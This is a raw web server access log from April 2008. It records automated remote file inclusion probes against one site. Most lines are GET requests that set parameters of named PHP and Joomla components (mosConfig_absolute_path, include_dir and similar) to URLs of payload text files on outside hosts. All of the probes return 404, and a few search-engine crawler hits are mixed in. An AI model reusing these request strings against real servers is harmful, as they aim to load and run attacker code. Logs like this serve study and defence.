89.108.66.169 - - [06/Apr/2008:18:25:43 -0700] "GET /logs/access_070910.log//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.169 - - [06/Apr/2008:18:25:43 -0700] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.169 - - [06/Apr/2008:18:25:44 -0700] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.105.35.14 - - [06/Apr/2008:18:25:55 -0700] "GET /logs/access_070806.log//include/main.php?config[search_disp]=true&include_dir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.105.35.14 - - [06/Apr/2008:18:25:55 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.191.104.52 - - [06/Apr/2008:18:26:15 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:26:45 -0700] "GET /logs/access_071015.log/index.php?inc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:26:45 -0700] "GET /index.php?inc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:26:45 -0700] "GET /logs/index.php?inc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.7.82 - - [06/Apr/2008:18:26:47 -0700] "GET /logs/access_071217.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lonnie.com.au/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.7.82 - - [06/Apr/2008:18:26:48 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lonnie.com.au/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:26:48 -0700] "GET /logs/access_071217.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:26:49 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:26:49 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.84.7.82 - - [06/Apr/2008:18:26:56 -0700] "GET /logs/access_080317.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lonnie.com.au/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:26:58 -0700] "GET /logs/access_071217.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:26:59 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:26:59 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:27:15 -0700] "GET /logs/access_071119.log/template.php?pagina=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:27:16 -0700] "GET /template.php?pagina=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:27:16 -0700] "GET /logs/template.php?pagina=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:27:16 -0700] "GET /logs/access_071217.log/index.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:27:41 -0700] "GET /logs/access_071231.log/template.php?pagina=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.108.66.169 - - [06/Apr/2008:18:28:00 -0700] "GET /logs/access_070820.log//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.105.35.14 - - [06/Apr/2008:18:28:15 -0700] "GET /logs/access_070709.log//include/main.php?config[search_disp]=true&include_dir=http://test10.digitalis.com.pa/cache/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.108.66.169 - - [06/Apr/2008:18:28:21 -0700] "GET /logs/access_070910.log//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.169 - - [06/Apr/2008:18:28:22 -0700] "GET //admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.108.66.169 - - [06/Apr/2008:18:28:22 -0700] "GET /logs//admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:28:49 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:28:49 -0700] "GET /logs/access_080317.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:28:49 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:28:49 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:28:52 -0700] "GET /logs/access_080317.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.234.133.218 - - [06/Apr/2008:18:28:58 -0700] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
85.234.133.218 - - [06/Apr/2008:18:28:59 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/HRtest/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:29:01 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:29:02 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:29:02 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.174.24.65 - - [06/Apr/2008:18:29:09 -0700] "GET /logs/access_071210.log/main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.174.24.65 - - [06/Apr/2008:18:29:10 -0700] "GET /main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.174.24.65 - - [06/Apr/2008:18:29:10 -0700] "GET /logs/main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:29:28 -0700] "GET /logs/access_080113.log/index.php?nic=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:29:28 -0700] "GET /index.php?nic=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:29:29 -0700] "GET /logs/index.php?nic=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.114.135.126 - - [06/Apr/2008:18:29:54 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.173.177.11 - - [06/Apr/2008:18:30:10 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.173.177.11 - - [06/Apr/2008:18:30:11 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.173.177.11 - - [06/Apr/2008:18:30:11 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.30.216.60 - - [06/Apr/2008:18:31:06 -0700] "GET /logs/access.log HTTP/1.0" 200 110511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.114.135.126 - - [06/Apr/2008:18:31:27 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.174.24.65 - - [06/Apr/2008:18:31:35 -0700] "GET /logs/access_080303.log/main.php?x=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:31:59 -0700] "GET /logs/access_070730.log/index.php?inc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.169.116 - - [06/Apr/2008:18:33:16 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.169.116 - - [06/Apr/2008:18:33:16 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:18:33:53 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:18:33:53 -0700] "GET //ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.207.204.13 - - [06/Apr/2008:18:33:54 -0700] "GET /logs//ashnews.php?pathtoashnews=http://geocities.com/d_ibenk/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:34:38 -0700] "GET /logs/access_080310.log/index.php?meio=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:34:38 -0700] "GET /index.php?meio=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:34:38 -0700] "GET /logs/index.php?meio=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:34:40 -0700] "GET /logs/access_071210.log/main.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:34:40 -0700] "GET /main.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:34:40 -0700] "GET /logs/main.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:35:02 -0700] "GET /logs/access.log/index.php?meio=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.150.231.30 - - [06/Apr/2008:18:35:05 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.phreeow.net/wiki/img/wiki/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:36:09 -0700] "GET /logs/access_071210.log/index.php?doc=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:37:31 -0700] "GET /logs/access_080303.log/main.php?x=http://dosbrteam.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.89.137.99 - - [06/Apr/2008:18:39:05 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
81.89.137.99 - - [06/Apr/2008:18:39:05 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
81.89.137.99 - - [06/Apr/2008:18:39:06 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.89.191.68 - - [06/Apr/2008:18:41:43 -0700] "GET /logs/access_080218.log//templates/mangobery/footer.sample.php?Site_Path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.89.191.68 - - [06/Apr/2008:18:41:44 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.89.191.68 - - [06/Apr/2008:18:41:44 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.89.191.68 - - [06/Apr/2008:18:42:00 -0700] "GET /logs/access_080317.log//templates/mangobery/footer.sample.php?Site_Path=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.135.126 - - [06/Apr/2008:18:43:05 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
85.114.135.126 - - [06/Apr/2008:18:43:06 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
74.220.215.233 - - [06/Apr/2008:18:44:42 -0700] "GET /logs/access_071210.log/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:44:42 -0700] "GET /main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:44:42 -0700] "GET /logs/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.104.52 - - [06/Apr/2008:18:44:53 -0700] "GET /logs/access_071203.log/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.104.52 - - [06/Apr/2008:18:44:53 -0700] "GET /logs/index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.169.116 - - [06/Apr/2008:18:46:38 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.169.116 - - [06/Apr/2008:18:46:38 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:46:56 -0700] "GET /logs/access_071001.log//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:46:56 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:46:56 -0700] "GET /logs/access_071001.log//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:46:57 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.frilufts.se/malmo/tvm//pollphp/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:46:57 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.120.225.104 - - [06/Apr/2008:18:46:57 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://stats.dke-clan.nl/gamelogs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:47:24 -0700] "GET /logs/access_080303.log/main.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.114.135.126 - - [06/Apr/2008:18:48:57 -0700] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.135.126 - - [06/Apr/2008:18:48:58 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.150.231.30 - - [06/Apr/2008:18:48:58 -0700] "GET /logs/access_071217.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.phreeow.net/wiki/img/wiki/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.150.231.30 - - [06/Apr/2008:18:48:59 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.phreeow.net/wiki/img/wiki/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.150.231.30 - - [06/Apr/2008:18:49:25 -0700] "GET /logs/access_080317.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.phreeow.net/wiki/img/wiki/d.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.89.137.99 - - [06/Apr/2008:18:49:53 -0700] "GET /logs/access_080107.log/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.89.137.99 - - [06/Apr/2008:18:49:53 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.89.137.99 - - [06/Apr/2008:18:49:54 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.18.207.65 - - [06/Apr/2008:18:51:04 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.18.207.65 - - [06/Apr/2008:18:51:04 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:51:35 -0700] "GET /logs/access_071015.log/index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:51:35 -0700] "GET /index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:51:35 -0700] "GET /logs/index.php?configFile=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.74.65.15 - - [06/Apr/2008:18:52:59 -0700] "GET /logs/access_080317.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.74.65.15 - - [06/Apr/2008:18:52:59 -0700] "GET /logs/access_080317.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.74.65.15 - - [06/Apr/2008:18:52:59 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.74.65.15 - - [06/Apr/2008:18:53:00 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.74.65.15 - - [06/Apr/2008:18:53:00 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.74.65.15 - - [06/Apr/2008:18:53:00 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:53:29 -0700] "GET /logs/access_071015.log/index.php?open=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:53:30 -0700] "GET /index.php?open=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.220.215.233 - - [06/Apr/2008:18:53:30 -0700] "GET /logs/index.php?open=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
122.152.140.206 - - [06/Apr/2008:18:53:32 -0700] "GET / HTTP/1.1" 200 1048 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.galf.org"
213.173.177.11 - - [06/Apr/2008:18:54:17 -0700] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.173.177.11 - - [06/Apr/2008:18:54:18 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.173.177.11 - - [06/Apr/2008:18:54:18 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.173.177.11 - - [06/Apr/2008:18:54:31 -0700] "GET /logs/access_080107.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
203.146.251.182 - - [06/Apr/2008:18:54:39 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
203.146.251.182 - - [06/Apr/2008:18:54:39 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://mabooshi.com/system/cache/pictures/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
